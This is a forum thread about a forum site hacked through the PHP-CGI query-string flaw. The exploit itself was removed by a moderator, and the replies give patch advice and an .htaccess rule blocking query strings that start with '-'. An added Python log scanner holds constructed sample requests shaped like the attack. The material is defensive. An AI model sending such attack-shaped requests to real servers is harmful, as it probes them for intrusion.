hackers breached my site through UBB
#249131 05/11/2012 10:19 AM
Joined: May 2008
Posts: 735
old hand
OP Offline
hackers found a way to inject a file onto my site that self replicated throughout my server and injected malicious code in all index.htm and index.html files.

they did it with this...
Code
-- SD: saved code locally and removed from post --

and this is what they were injecting...

I am using UBB 7.5.6p2


Last edited by SD; 05/11/2012 11:44 AM. Reason: Just removed actual exploit line

"No matter where you go, there you are."
"If you can't do something smart, Do something right"
"There are three kinds of people in the world, those who can count, and those who can't"
Re: hackers breached my site through UBB
Bad Frog #249132 05/11/2012 11:40 AM
Joined: Jun 2006
Posts: 81
member
Offline
If the above code works, it is WAY NOT COOL and irresponsible to post it in public.

Please delete it and send it to UBBSystem as a PM or e-mail or both.


Re: hackers breached my site through UBB
Bad Frog #249133 05/11/2012 11:42 AM
Joined: Apr 2007
Posts: 3,940
SD Offline
Former Developer
it's a php flaw and not a ubb flaw. ( from what i've gathered )

if your host is running php as a CGI, then there is a known exploit to any php that can be temporarily fixed with .htaccess change..

http://www.php.net/archive/2012.php#id2012-05-03-1

Quote
To fix this, update to PHP 5.3.12 or PHP 5.4.2.

We recognize that since CGI is a rather outdated way to run PHP, it may not be feasible to upgrade these sites to a modern version of PHP.

An alternative is to configure your web server to not let these types of requests with query strings starting with a "-" and not containing a "=" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this:

( mod_rewrite must be enabled - usually is - add to .htaccess )

Code
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]

can you run phpinfo ( from your cpanel and verify ? )

ty smile
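
Added example, not part of the original posts or of the php.net notice: a log check that applies the same test as the RewriteCond above (raw query string starts with "-" or "%2d" and contains no "=") to Apache access-log entries, so an admin can see whether such requests reached the site. The log lines, paths and IP addresses are constructed samples.

```python
import re
from collections import Counter

# Same test as the RewriteCond: Apache's QUERY_STRING is the raw, still
# percent-encoded query, so "%2d"/"%2D" is checked as well as a literal "-".
SUSPICIOUS_QS = re.compile(r"(%2d|-)[^=]+", re.IGNORECASE)

# Client address and request line of a common/combined log entry.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Constructed sample entries (documentation IP ranges, made-up paths).
SAMPLE_LOG = """\
203.0.113.7 - - [11/May/2012:09:58:01 +0000] "GET /index.php?-flag HTTP/1.1" 200 512
203.0.113.7 - - [11/May/2012:09:58:03 +0000] "POST /forum/index.php?%2Dflag+value HTTP/1.1" 200 17
198.51.100.4 - - [11/May/2012:10:01:44 +0000] "GET /index.php?page=2 HTTP/1.1" 200 9041
198.51.100.4 - - [11/May/2012:10:01:50 +0000] "GET /search.php?-a=1 HTTP/1.1" 200 733
192.0.2.9 - - [11/May/2012:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 2048
192.0.2.9 - - [11/May/2012:10:02:12 +0000] "GET /page.php?- HTTP/1.1" 200 2048
"""

def rule_matches(query_string):
    """True when the rewrite rule's condition would fire on this query string."""
    return SUSPICIOUS_QS.fullmatch(query_string) is not None

def scan(lines):
    """Return (client_ip, path, query_string) for every request the rule covers."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        path, sep, qs = m.group("target").partition("?")
        if sep and rule_matches(qs):
            hits.append((m.group("ip"), path, qs))
    return hits

def hits_per_client(hits):
    """Count matching requests per client address."""
    return Counter(ip for ip, _, _ in hits)

if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for ip, path, qs in found:
        print(f"{ip} {path} ?{qs}")
    print(dict(hits_per_client(found)))
```

A hit only shows that a request of this shape arrived; whether it did anything depends on PHP running as plain CGI on an unpatched version, as discussed in the thread.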

Re: hackers breached my site through UBB
Bad Frog #249134 05/11/2012 11:46 AM
Joined: Apr 2007
Posts: 3,940
SD Offline
Former Developer
note: if your PHP is running as a FAST CGI or DSO, then this can't be exploited.

so push your host to run 1 of the 2 AND have php upgraded to latest version.

this has been around in php/cgi for 8yrs...

you should really push your host to:

Quote
Cid advised Web servers administrators who run PHP through php-cgi, to update to the new PHP 5.4.3 or PHP 5.3.13, or to modify their setup so that it uses the PHP module (mod_php) under Apache or FastCGI, which is not vulnerable.

if possible, however..

2c

Re: hackers breached my site through UBB
Bad Frog #249145 05/11/2012 12:50 PM
Joined: Dec 2003
Posts: 1,796
Pooh-Bah
Offline
zoinks, or change hosts if they refuse to update 8 year old software - there's a responsibility to customers regarding this when they decide to accept money for hosting.


- Allen
- ThreadsDev | PraiseCafe
Re: hackers breached my site through UBB
Bad Frog #249146 05/11/2012 12:52 PM
Joined: Apr 2007
Posts: 3,940
SD Offline
Former Developer
well, it's an 8yr old bug.. the software ( php ) is recent builds, but the host has decided to run it as a CGI ( ancient )..

note: ubbcentral runs as fastcgi ( safe ) here.

so you are correct, allen, that the host should get away from CGI and/or upgrade to one of those 2 versions of php

smile

Re: hackers breached my site through UBB
Bad Frog #249155 05/11/2012 4:07 PM
Joined: May 2008
Posts: 735
old hand
OP Offline
I pointed my host to this thread and they took care of things.
Thank you for the help!


